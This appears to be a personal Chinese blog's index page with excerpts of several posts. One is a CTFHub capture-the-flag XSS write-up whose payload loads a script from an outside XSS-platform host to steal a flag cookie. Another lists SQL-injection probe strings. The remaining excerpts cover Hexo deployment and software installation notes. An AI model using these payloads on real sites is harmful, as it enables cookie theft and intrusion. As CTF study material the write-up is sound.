Sigma

一、寻找漏洞在搜索框中随意输入字符，发现输入的字符直接出现在界面上。然后输入特殊字符进行尝试 12<script>alert(1)</script>//括号里的1可以为任意字符，将显示在弹窗界面上 出现了弹窗，表明网页没有对用户的输入进行处理，直接输出到界面上。XSS漏洞出现。 二、实施攻击在第一个搜索框中输入下面构造的payload，并点击submit 12</textarea>'"><script src=http://xsscom.com//a0zR72></script>//这个payload将执行http://xsscom.com//a0zR72下的项目代码 然后在网页源代码中查找到这个payload是完整的，同时submit点击之后，URL发生改变。 将改变后的URL在第二个搜索框中输入并send 此时XSS platform收到了报文，在cookies中发现了flag cookie : flag=ctfhub{3efc235465db70e45070d143}

目前，有三种解决方法。主要有两种合适的解决办法, 一、git repo配置地址不正确我目前所遇到的问题都是这个方法解决的，去GitHub上的仓库里重新复制HTTPS，更改一下repo。 下面是将http方式改为ssh 1234567891011121314##进入站点根目录cd /usr/local/src/hexo/hanyubolg/##删除git提交内容文件夹vim _config.yml##修改deploy:type: gitrepo: https://github.com/yourname/yourname.github.io.git -> git@github.com:a956551943/weixiaohui.github.io.gitbranch: main##最后hexo clean && hexo g && hexo d 二、删除git提交内容，然后更改换行符自动转换的设置1234567891011##进入站点根目录cd /usr/local/src/hexo/hanyubolg/##删除git提交内容文件夹rm -rf .d ...

一、判断有无注入点1.加入单引号’提交结果：如果出现错误提示，则该网站就可能存在注入漏洞。 2.数字型判断是否有注入①语句： and 1=1 and 1=2（经典） ‘and’1’=1(字符型)结果：分别返回不同的页面，说明存在注入漏洞 分析：and 的意思是“和”如果没有过滤我们的语句，and 1=1就会被代入SQL查询语句进行查询，如果and前后的两条语句都是真的话就不会出错，但如果前后语句有一个为假的话，程序就会暴错。也就表明程序有注入漏洞 ②语句：or 2>1 or 1>2结果：分别返回不同的页面，说明存在注入漏洞 分析：or注入只要求前后两个语句只要有一个正确就为真，如果前后两个语句都是正确的，反而为假。（or注入时，or后面的语句如果是正确的，则返回错误页面！如果是错误，则返回正确页面，说明存在注入点。） ③语句：xor 1=1 xor 1=2结果:分别返回不同的页面,说明存在注入漏洞.分析:xor 代表着异或,意思即连接的表达式仅有一个为真的时候才为真。(xor注入时，xor后面的语句如果是正确的，则返回错误页面积，如果是 ...

一、安装注意更改安装路径，其余直接下一步，至安装结束。 二、注册XOC组件组件名称 comdlg32.ocx MSCOMCT2.OCX MSCOMCTL.OCX THREED32.OCX 将几个组件和批处理文件移动到C:\Windows\SysWOW64中，以管理员身份运行批处理文件。 三、导入PDF卡片打开软件，到PDF选项然后点击Set up，点击第一行最右边的手指，选择pdf2.dat文件，然后 点击select all，接着点击create，等待create结束。 PS:Onedrive上有下载程序以及组件的压缩包。

Jade 6安装方法更改兼容性点击exe先进行下载，然后找到jade6.exe将兼容性改为Windows 7。 安装缺失控件comdlg32.ocx MSCOMCT2.OCX MSCOMCTL.OCX THREED32.OCX 将这几个控件和批处理程序移动到*C:\Windows\SysWOW64* 然后运行一下批处理程序，即可。 PS：文件在Onedrive上有备份。 安装后由于注册表导入的用户名一直出错，导致pdf卡片无法导入，放弃该版本下载，改用其他下载。

First time to use this!一、上传文档操作步骤：首先把文件放在source里边，然后在Blog目录中打开Git Bush,然后依次执行下列操作。 清除：hexo clean 生成：hexo generate 上传：hexo deploy PS： 上传完之后，在线网页用control+F5强制刷新一下；也可使用hexo s 打开离线网页 二、创建新文档hexo new “title” 创建的文档应该默认是md文档 三、命令行的使用ls列出当前所在目录，cd打开目录，运行程序是可以直接输入该文件的名称。 control+home，control+end分别将光标移动到最左边，最右边。 鼠标右键直接粘贴。